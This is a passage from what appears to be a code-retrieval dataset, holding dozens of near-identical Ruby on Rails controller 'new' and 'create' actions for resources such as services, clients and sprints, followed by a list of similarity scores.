"def create\n\n respond_to do |format|\n if @service.save\n format.html { redirect_to(@service, :notice => t(\"screens.notice.successfully_created\")) }\n format.xml { render :xml => @service, :status => :created, :location => @service }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @service.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @service = Service.new\n @service.date = Time.now.strftime('%Y-%m-%d ')\n\n respond_to do |format|\n format.html # new.html.haml\n format.json { render json: @service }\n end\n end",
"def new\n @approximate_service = ApproximateService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @approximate_service }\n end\n end",
"def create\n @service = Service.new(params[:service])\n\n respond_to do |format|\n if @service.save\n flash[:notice] = 'Service was successfully created.'\n format.html { redirect_to(@service) }\n format.xml { render :xml => @service, :status => :created, :location => @service }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @service.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @service_checker = ServiceChecker.new(:strict => \"0\", :checker_type => \"0\")\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_checker }\n end\n end",
"def new\n @services_charger = ServicesCharger.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @services_charger }\n end\n end",
"def new\n @service_style = ServiceStyle.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_style }\n end\n end",
"def create\n @service = Service.new(params[:service])\n \n respond_to do |format|\n if @service.save\n flash[:notice] = 'Service was successfully created.'\n format.html { redirect_to(@service) }\n format.xml { render :xml => @service, :status => :created, :location => @service }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @service.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @service.service_type = params[:service_type]\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def new\n @service_center = ServiceCenter.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_center }\n end\n end",
"def new_rest\n @instrument_version = InstrumentVersion.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @instrument_version }\n end\n end",
"def create\n @service = Service.new(params[:service])\n\n respond_to do |format|\n if @service.save\n format.html { redirect_to(admin_service_path(@service), :notice => 'Service was successfully created.') }\n format.xml { render :xml => @service, :status => :created, :location => @service }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @service.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @tso = Tso.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @tso }\n end\n end",
"def new\n respond_to do |format|\n format.html { render_template } # new.html.erb\n format.xml { render xml: @system }\n end\n end",
"def new\n @service = Service.new\n\n # If a valid type is received, apply to the host to create.\n check_priority_param\n @service.priority = @priority if(!@priority.blank?)\n\n # Add custom views paths\n prepend_view_path \"app/views/services\"\n prepend_view_path \"lib/probes/#{@service.probe}/views\"\n\n respond_to do |format|\n format.html\n end\n end",
"def new\n respond_to do |format|\n format.html { render_template } # new.html.erb\n format.xml { render xml: @software }\n end\n end",
"def new\n @service = Service.new\n @vendors = Vendor.all\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service }\n end\n end",
"def new\n @rest_service = RestService.new\n params[:annotations] = { }\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @rest_service }\n end\n end",
"def new\n @nagios_service_escalation_template = NagiosServiceEscalationTemplate.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @nagios_service_escalation_template }\n end\n end",
"def new\n @query = Query.new\n @discActions = DiscoveryActions.new\n $DATA_SERVICES ||= @discActions.getDataServices\n @services = $DATA_SERVICES\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @query }\n end\n end",
"def new\n @online_service = OnlineService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @online_service }\n end\n end",
"def new\n @service_length = ServiceLength.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_length }\n end\n end",
"def create\n # Creation of a Service resource is not allowed. Must be created as part of the creation of a specific service type resource.\n flash[:error] = 'Select the type of service you would like to submit first'\n respond_to do |format|\n format.html { redirect_to(new_service_url) }\n format.xml { render :xml => '', :status => 404 }\n end\n end",
"def newX\n @server = Server.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @server }\n end\n end",
"def new\n @service_plan = ServicePlan.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_plan }\n end\n end",
"def new\n @title = \"New Operations\"\n @operation = Operation.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @operation }\n end\n end",
"def new\n @project = Project.new\n @services = Service.find(:all)\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def new\n @webservicetolisten = Webservicetolisten.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @webservicetolisten }\n end\n end",
"def new\n @service_type = ServiceType.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service_type }\n end\n end",
"def new\n @service_request = ServiceRequest.new\n\t@servicegrades = ServiceGrade.all\n\t@curr_menu = \"layouts/hostfamily_menu\"\n\t@curr_layout = \"layouts/user_layout\"\n\t\t\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_request }\n end\n end",
"def new\n @discovery = Discovery.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @discovery }\n end\n end",
"def new\n @node = Node.scopied.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @node }\n end\n end",
"def new_rest\n @item_usage = ItemUsage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @item_usage }\n end\n end",
"def new\n respond_to do |format|\n format.html\n format.xml\n end\n end",
"def new\n respond_to do |format|\n format.html { render_template } # new.html.erb\n format.xml { render xml: @get_started_page }\n end\n end",
"def new\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @instituto }\n end\n end",
"def new\n respond_to do |format|\n format.html # new.html.erb\n format.xml \n end\n end",
"def new\n @servicetype = Servicetype.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @servicetype }\n end\n end",
"def new\n @serie = Serie.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @serie }\n end\n end",
"def new\n @servicetype = Servicetype.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @servicetype }\n end\n end",
"def new\n @client = Client.new\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @client }\n end\n\n end",
"def new\n @service_check_detail = ServiceCheckDetail.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_check_detail }\n end\n end",
"def new\n @client = Client.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @client }\n end\n end",
"def new\n @client = Client.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @client }\n end\n end",
"def new_rest\n @entry_item = EntryItem.new\n\n respond_to do |format|\n #format.html # new.html.erb\n format.xml { render :xml => @entry_item }\n end\n end",
"def new\n @client = Client.new\n respond_to do |format|\n format.html #new.html.erb\n format.xml { render :xml => @client }\n end\n end",
"def new\n @provider = Provider.new\n @provider.build_address\n @services = Service.all\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @provider }\n end\n end",
"def new\n @solicitud = Solicitud.new\n \n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @solicitud }\n end\n end",
"def new\n @bus_service = BusService.new\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @bus_service }\n end\n end",
"def new\n @people = People.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @people }\n end\n end",
"def new\n @todos = Todos.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @todos }\n end\n end",
"def new\n @st_pi = StPi.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @st_pi }\n end\n end",
"def new\n @procedure = Procedure.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @procedure }\n end\n end",
"def new\n @echo = Echo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @echo }\n end\n end",
"def add_service(service={})\n request :post, '/services', service\n end",
"def new\n @additional_service = AdditionalService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @additional_service }\n end\n end",
"def new_rest\n @entry_instrument = EntryInstrument.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @entry_instrument }\n end\n end",
"def new\n @novel = Novel.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @novel }\n end\n end",
"def new\n @estagio = Estagio.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @estagio }\n end\n end",
"def service(id)\n request :get, \"/services/#{id}\"\n end",
"def new\n @sti = Sti.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @sti }\n end\n end",
"def new\n respond_to do |format|\n format.html { render_template } # new.html.erb\n format.xml { render xml: @page }\n end\n end",
"def new\n @operation = Operation.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @operation }\n end\n end",
"def new\n @sprint = Sprint.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @sprint }\n end\n end",
"def new\n @sprint = Sprint.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @sprint }\n end\n end",
"def new\n @serviceorg = Serviceorg.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @serviceorg }\n end\n end",
"def new\n @recurso = Recurso.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @recurso }\n end\n end",
"def new\n @api = Api.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @api }\n end\n end",
"def new\n @service_record = ServiceRecord.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service_record }\n end\n end",
"def new\n @namespace = Namespace.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @namespace }\n end\n end",
"def new\n\t\tPesqSecDep()\n\t\t@cliente = Cliente.new\n\t\trespond_to do |format|\n\t\t\tformat.html # new.html.erb\n\t\t\tformat.xml {render :xml => @cliente}\n\t\tend\n\tend",
"def new\n @status = Status.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @status }\n end\n end",
"def new\n @status = Status.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @status }\n end\n end",
"def new\n @status = Status.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @status }\n end\n end",
"def new\n @omatsuri = Omatsuri.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @omatsuri }\n end\n end",
"def new\n @cliente = Cliente.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @cliente }\n end\n end",
"def new\n @cliente = Cliente.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @cliente }\n end\n end",
"def new\n @value_added_service = ValueAddedService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @value_added_service }\n end\n end",
"def new\n @servicio = Servicio.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @servicio }\n end\n end",
"def new\n @shelf = Shelf.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @shelf }\n end\n end",
"def new\n logger.debug 'new_some interesting information'\n @comdty = Comdty.new\n setvariables\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @comdty }\n end\n end",
"def new\n @route = Route.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @route }\n end\n end"
] |
[
"0.75526565",
"0.751664",
"0.74515957",
"0.74515957",
"0.7020331",
"0.6930191",
"0.672832",
"0.67085844",
"0.67085844",
"0.67085844",
"0.67085844",
"0.66661394",
"0.6652868",
"0.6649297",
"0.66376245",
"0.6555149",
"0.6471848",
"0.647095",
"0.6424378",
"0.6417366",
"0.6382543",
"0.6358173",
"0.6352584",
"0.6352069",
"0.6345033",
"0.63436645",
"0.6342431",
"0.6322157",
"0.63137484",
"0.6293398",
"0.6288208",
"0.6280398",
"0.62621313",
"0.62512535",
"0.62245035",
"0.62190604",
"0.62150633",
"0.6210623",
"0.61895365",
"0.6187218",
"0.61840034",
"0.61803544",
"0.61693513",
"0.6153133",
"0.6142242",
"0.61229",
"0.610741",
"0.61016667",
"0.60969263",
"0.60835785",
"0.60720307",
"0.6071866",
"0.60631937",
"0.60604477",
"0.6059892",
"0.60562515",
"0.60550755",
"0.605238",
"0.60510665",
"0.604776",
"0.604215",
"0.604215",
"0.60364836",
"0.6031131",
"0.60304064",
"0.60240835",
"0.60211354",
"0.60207707",
"0.60182154",
"0.6017251",
"0.5994964",
"0.59946156",
"0.59945714",
"0.59929407",
"0.5983412",
"0.59820914",
"0.5980993",
"0.598065",
"0.5976521",
"0.5975711",
"0.59732777",
"0.5969431",
"0.5969431",
"0.59650487",
"0.5963501",
"0.5963459",
"0.59625536",
"0.59620285",
"0.5960629",
"0.5959945",
"0.5959945",
"0.5959945",
"0.595743",
"0.5954696",
"0.5954696",
"0.5954528",
"0.5950277",
"0.59496915",
"0.594555",
"0.59440696"
] |
0.6335051
|
27
|